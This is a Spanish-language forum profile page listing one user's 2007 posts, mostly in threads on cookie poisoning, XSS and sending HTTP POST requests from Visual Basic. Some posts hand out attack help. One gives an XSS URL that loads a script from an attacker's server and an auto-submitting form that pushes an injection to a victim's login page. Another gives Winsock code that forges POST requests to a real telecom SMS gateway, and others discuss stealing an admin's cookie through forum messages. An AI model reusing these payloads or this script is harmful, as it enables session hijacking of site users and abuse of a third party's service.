Cita de: Hans el Topo en 28 Mayo 2007, 20:33 PM
la mitad de los foros no permitirán que postees nada con ese método y la otra mitad te baneará xD
Me da a mi que no tiene por qué haber ningún problema...
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#201
Programación Visual Basic / Re: POST y visua basic
29 Mayo 2007, 00:59 AMMe da a mi que no tiene por qué haber ningún problema...
#202
Nivel Web / Re: Tutorial Cookie Poisoning
29 Mayo 2007, 00:54 AMCita de: raka en 28 Mayo 2007, 22:36 PM
En todos los vBulletin k he entrado las etiquetas <script> funcionan bien ya k me he robado mi cookie
Saludos
Quizás en el foro vBulleting donde estuve realizando las pruebas había instalado algún addon para evitar el uso de estas etiquetas...
#203
Foro Libre / Re: Edad Promedio de Usuarios del Foro.
28 Mayo 2007, 18:47 PMCita de: ZeroSkinet en 28 Mayo 2007, 17:24 PM
yo cuando he leido lo que ponia alguno de estos chavales he pensado... ¿Saldran de su casa? Yo cuando tenia 12 años no pisaba mi casa, aver si tomais ejemplo la calle te enseña mas que tu pc!
Típico comentario del que quiere saber más pero no puede...
#204
Nivel Web / Re: Tutorial Cookie Poisoning
28 Mayo 2007, 17:13 PMCita de: raka en 28 Mayo 2007, 16:47 PM
Me he podido dar cuenta k en muchos foros vBulletin la opcion de HTML esta on,esto supongo k hace k puedas hacer XSS, no?? posteando un tema y atrayendo al admin del foro hasta el o sino tambien puedes escribirle un privado si esta activado el HTML y cuadno lo lea...listo(no se si esta ultima funcione)
Saludos
Cuando esta HTML activado muchas etiquetas, como <script>, quedan inutilizadas para evitar el mal uso de estas...
#205
Programación Visual Basic / Re: POST y visua basic
28 Mayo 2007, 14:45 PMCita de: Xerok1! en 27 Mayo 2007, 23:11 PM
una pregunta,este mekanismo se podria utilizar o es el utilizado para crear el ice cold??
si no es asi debe ser algo muy parecido..
un saludo
Una de tantas...
#206
Foro Libre / Re: Edad Promedio de Usuarios del Foro.
28 Mayo 2007, 14:33 PMCita de: to_rayao en 28 Mayo 2007, 13:22 PM
Hay gente aburrida, me he leido el post entero... no se que decir...tengo 26, y creo que he perdido mucho tiempo sin leer cosas de informatica, pero a todos estos de 12 o 13 que se piensan que son amos del universo y tal, un consejito....
No me arrepiento de jugar con mis amigos en la calle, de tontear con amiguitas y tal, cada edad tiene unas cosas, y si te pierdes las cosas de tu edad no las recuperas.
Solo tienes una vida y una oportunidad de vivirla....piensalo
Saludos.
No soy yo el fanático del Winamp, ATI, AMD, CS, y también supongo que un largo etcétera...
Hay individuos tanto de 12 y 13 años como de 20 y 21 años que se creen que por usar un troyano son dioses. Igualmente hay freaks de esas edades que no tienen vida social, es su estilo de vida, allá ellos....
#207
Nivel Web / Re: Cross Site Scripting (XSS)
27 Mayo 2007, 21:00 PM
No, necesitas alguna herramienta tipo Netcat.
#208
Programación Visual Basic / Re: POST y visua basic
27 Mayo 2007, 14:25 PMCita de: satan69 en 26 Mayo 2007, 18:26 PMCita de: YeIk0s en 26 Mayo 2007, 15:55 PMCita de: satan69 en 25 Mayo 2007, 20:42 PM
lo probe pero no me funciona...
y desde el Inet...?
Sí funciona, escribe el código para que te podamos ayudar.
mejor te voy a enviar un mp.. porque no quiero que caiga en malos intensinadas
No comparto esa misma opinión, esto es un foro, y como tal, los conocimientos aprendidos aquí deben de ser compartidos...
Código [Seleccionar]
Private Sub Form_Load()
Winsock1.Close
Winsock1.RemoteHost = "web.movistar.com.ni"
Winsock1.RemotePort = "80"
Winsock1.Connect
End Sub
Private Sub Winsock1_Connect()
strVar = "txtParaNumero=&txtMensaje=&txtDeQuien=&txtDeNumero=&txtContador=0¶=XXXXXX&men=sms&dnom=s0cratex&dnum=XXXXXX&contador=23&btnEnviar.x=17&btnEnviar.y=15"
strData = "POST /cgi-bin/sms.cgi HTTP/1.0" & vbCrLf
strData = strData & "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*" & vbCrLf
strData = strData & "Referer: http://sms.movistar.com.ni/" & vbCrLf
strData = strData & "Accept-Language: es-mx" & vbCrLf
strData = strData & "Content-Type: application/x-www-form-urlencoded" & vbCrLf
strData = strData & "Proxy-Connection: Keep-Alive" & vbCrLf
strData = strData & "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.2)" & vbCrLf
strData = strData & "Host: web.movistar.com.ni" & vbCrLf
strData = strData & "Content-Length: " & Len(strVar) & vbCrLf
strData = strData & "Pragma: no-cache" & vbCrLf & vbCrLf
strData = strData & strVar & vbCrLf & vbCrLf
Winsock1.SendData strData
End Sub
#209
Programación Visual Basic / Re: POST y visua basic
26 Mayo 2007, 15:55 PMCita de: satan69 en 25 Mayo 2007, 20:42 PM
lo probe pero no me funciona...
y desde el Inet...?
Sí funciona, escribe el código para que te podamos ayudar.
#210
Nivel Web / Re: Tutorial Cookie Poisoning
26 Mayo 2007, 15:53 PMCita de: raka en 25 Mayo 2007, 20:54 PM
Una pregunta, esto:Código [Seleccionar]http://[victima]/index.php?login=<script src="http://[server]/script.js
se supone k donde esta http://[victima]/index.php?login= esa pagina debe de ser vulnerable al XSS? o no por k si el bug esta en los post de un foro...no serviria,no??la segunda parte la entiendo bien
gracias
Sí, y en caso de que la variable afectada por la inyección XSS solo admita pasar datos mediante la variable POST...
Código [Seleccionar]
<!-- xss.html --!>
<META HTTP-EQUIV="Refresh" CONTENT="1; URL=javascript:document.forms[0].submit()">
<form action="http://[victima]/login.php" method="POST">
<input type="hidden" name="user" value="INYECCIÓN-XSS">
<input type="hidden" name="pass" value="*****" />
</form>